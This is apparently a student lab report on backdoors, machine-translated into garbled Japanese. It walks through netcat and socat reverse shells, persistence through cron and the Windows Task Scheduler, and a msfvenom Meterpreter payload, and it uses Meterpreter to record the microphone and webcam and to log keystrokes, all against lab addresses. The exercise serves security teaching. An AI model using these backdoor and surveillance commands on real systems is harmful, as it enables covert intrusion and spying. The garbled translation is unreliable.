実験名
原則と実践のバックドア。
原則
あなたはシステムへの通常の認証パスゲインアクセスをバイパスすることができ、それを通して、システムへのアクセスを取得するためのバイパスセキュリティコントロールや手順や方法へのバックドア手段。
攻撃者のために、ターゲット・ホストまたはサーバに侵入するバックドアを使用し、最初のプログラムを持っている必要があり、攻撃者は、バックドア機能を持ち、かつ含む多くのそのようなプログラムがある のnetcatシリーズ、Meterpreter、INTERSECT、およびWindows Updateおよびその他のは、その後、バックドアを配置する方法を見つけるためにターゲット・システムに、あなたがフィッシングサイト、Uディスクに直接コピーすることができ、およびバインド正当なソフトウェアを攻撃するために、送信電子メールツールや暴力的な攻撃は、ターゲット・システムにバックドア、バックドアは、次の作業を取得するには、あなたがターゲットホストにバックドアでのすべての権限を実行できるように、我々は、許可するバックドア、ターゲットシステム上で実行されていることができ、など、最初から起動するように設定することができ、稼働してドアまずバックする必要があり、作業を開始するタイミング、関連する開始操作。バックドアの持続可能な利用を行うために、あなたは削除されるから(技術を殺す避けるために悪意のあるコード)をアンチウイルスソフトウェアを必要とするだけでなく、ファイアウォール(接続を暗号化トンネリング技術、リバウンド接続)によってブロックされるのを避けるために、接続の安定性を確保します。
実験の目的と要件
・バックドアの概念、一般的な知識のバックドアの種類、バックドアの動作原理の深い理解を持ちます。
・マスター、いくつかの一般的なバックドア、バックドアの基本的なタスクのためのツールを使用することを学びます。
、バックドアの昇給意識をバックドアの危険性を認識し、情報セキュリティの意識を強化。
NCやnetcatを
また、NC、NCATとして知られています
勝利は、Linuxのシェルを入手します
Windowsでは使用するipconfigローカルIPを表示します
カーリー跳ね返りでは、Windowsのを接続しncat 192.168.132.1 5322 -e /bin/sh使用して、-eシェルプログラムを実行するオプションを
WindowsでLinuxシェルを取得、それはのような、任意のコマンドを実行することができますls。
LinuxはWindowsのシェルを取得します
Linuxのエンド入力IP addrはGET IPアドレスは192.168.181.129です。
オープンモニタリング nc -l -p 4307。
Windowsでは接続カーリーにリバウンド、ncat.exe -e cmd.exe 192.168.181.129 4307
カーリー成功したWindowsのコマンドプロンプト:
メートルPreter
- バックドアプログラムです。
- 伝統的な理解がある:バックドアを書くために誰かが、我々はそれらを使用しています。
- その後、いくつかの牛は、バックドアを生成するためのプラットフォームを書きたかったん。このプラットフォームは、バックドアを行います
- 基本機能(基本的な接続、命令を実行)、
- (このようなユーザ情報、インストールサービスやその他の機能を集めるなど)の拡張、
- 符号化モード、
- オペレーティング・プラットフォーム、
- そして、動作パラメータ
- 一部またはすべてが調整可能なパラメータを作りました。必要に応じて組み合わせて使用するときは、実行可能ファイルを生成することができます。
使用すると、ホスト・オペレーティング・シェルを得るnetcatを開始するcron
定期的に実行するcrontabの設定命令を。Linux側で:
入力 のcrontabは、cronのタスク領域を追加-e、[編集]を選択します3
* * * * / 192.168.181.1 4307 -e / binに/ SHの最後の行のbin / netcatを1時間ごとのバックポートのWindows 5301ホストの最初の35分を表すコード35を追加し、保存して終了。
夜08時35分に到着する時間ウィンドウの終了時に検証。
使用すると、シェルを操作するタスクを開始する計画をホストを取得しsocatに関する
socatに関するのNCATは、独立したデータチャネルのリレーとの間の双方向のデータ伝送の拡張バージョンです。これらのファイルは、IP、TCP、UDPなどのIPv6など、多数のプロトコルおよびリンク手段を主な機能は、2つのチャネル間のデータフローを確立することである、などのデータチャネル、パイプ、機器を含む、およびサポート。
Windowsの側socatに関するダウンロード・アーカイブで
Windowsでは、[コンピュータ]をクリック - [管理] - [] [タスクスケジューラタスクスケジューラライブラリ]の下で、[選択]は、タスクを作成します
トリガーを作成します。
CMD.EXE、PTY、:、操作を完了するパラメータを追加するには、TCP-聞く」追加する場合:4307 execの標準エラーこのアクションのコマンドがすることですcmd.exestdoutにポート5302にバインド、cmd.exeのリダイレクトながら、標準エラー出力
あなたは、タスクの準備ができている見ることができます。
まだアクセスが選択できるように、夜08時50分の時点でCMDウィンドウやファイアウォールの設定をポップアップ[]、Linux側でsocatに関する-TCPを入力します。192.168.181.1。接続、Windowsシェルへのアクセスを完了します。
MSFのmeterpreter使用NCAT使用して実行可能ファイルをホストに送信し、ホストオペレーティングシェルを取得
使用linuxのmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.132.138 LPORT=5322 -f exe > backdoor5322.exe生成バックドア
プログラムが成功を生成します。
Linuxの使用msfconsoleMSFコンソールを入力し、次のコマンドを入力するには:
モニタモジュールを使用して、ペイロードを設定します。使用は/マルチ/活用ハンドラ
使用して生成されたバックドア同じペイロードた場合:SETペイロードのWindows / Meterpreter / reverse_tcp
linuxのIPアドレス:lhost SET 192.168 0.132 0.138
同じポートを使用する:SET lportはは5322
待機を開始:エクスプロイト
使用MSFのmeterpreterなどコンテンツ取得対象ホストオーディオ、カメラ、キーロガーを、生成、および権利を入れてみてください
接続ステップと継続
・オーディオ入力コマンドrecord_micは15カーリー端子に-d 15秒を傍受しました。
写真を撮るためにカメラを使用しwebcam_snapコマンドを入力します。
答え質問
1.の例では、あなたのシステムにバックドアを入力することも可能な方法を考えることができますか?
:バックドアは、ソフトウェアの海賊版、ひびの入ったバージョンでインストールされています。
2.あなたはどのように知っていますが道(勝つとLinux)起動するバックドアを例示しますか?
A:Linuxの場合:起動するのcrontabの時間;注入シェルコード。
Windowsの場合:新しいタスクスケジューラ、最初からバックドアを設定するレジストリキーを変更、バックドアを持つユーザの実行ファイル。
これはあなたが3.Meterpreterディープマッピング機能を提供しますか?
A:カメラで音声制御することが可能です。
4.どのように私は、彼らが、システムがバックドアをインストールされていない持っていることを見つけるのですか?
A:検出するために、いくつかの専門的なソフトウェアによって、未知のサービスがあるかどうか、不明なスタートアップ項目があるかどうかを確認。
実験的な思考
実験は難しくありませんが、その効果を達成し、非常に私に衝撃を与えている他の人のコンピュータに入るとあなたのスクリーンショット、さらにはビデオ録画を取得し、その上でする簡単なので、専門的な学習の重要性の私はもっと意識せた、とは思いませんでした私はまた、バックドア型トロイの木馬の様々な、将来的にはインターネットやダウンロードがより慎重になり、通常のアンチウイルスおよびより多くの注目の重要性をネットワークに殺到したことに気づきました。